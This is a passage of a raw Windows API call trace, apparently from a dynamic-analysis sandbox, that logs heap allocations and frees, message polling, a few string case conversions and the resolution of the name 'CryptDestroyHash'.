[0260.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0260.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0260.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0260.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0260.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0260.205] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0260.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0260.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0260.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0260.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0260.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0260.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0260.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0260.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0260.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0260.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0260.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0260.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0260.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0260.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.207] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0260.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.208] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.208] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0260.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0260.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0260.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0260.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0260.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ca8 [0260.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0260.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0260.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0260.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0260.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0260.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0260.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0260.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0260.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0260.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0260.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0260.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0260.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0260.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0260.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0260.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0260.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0260.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0260.210] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0260.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0260.211] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0260.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0260.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0260.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.211] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0260.212] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0260.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.212] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0260.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0260.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0260.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0260.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0260.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0260.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0260.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0260.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0260.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0260.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0260.214] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0260.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0260.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0260.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0260.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0260.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0260.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0260.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0260.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0260.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0260.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0260.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0260.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0260.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0260.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466dd0 [0260.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0260.215] HeapFree 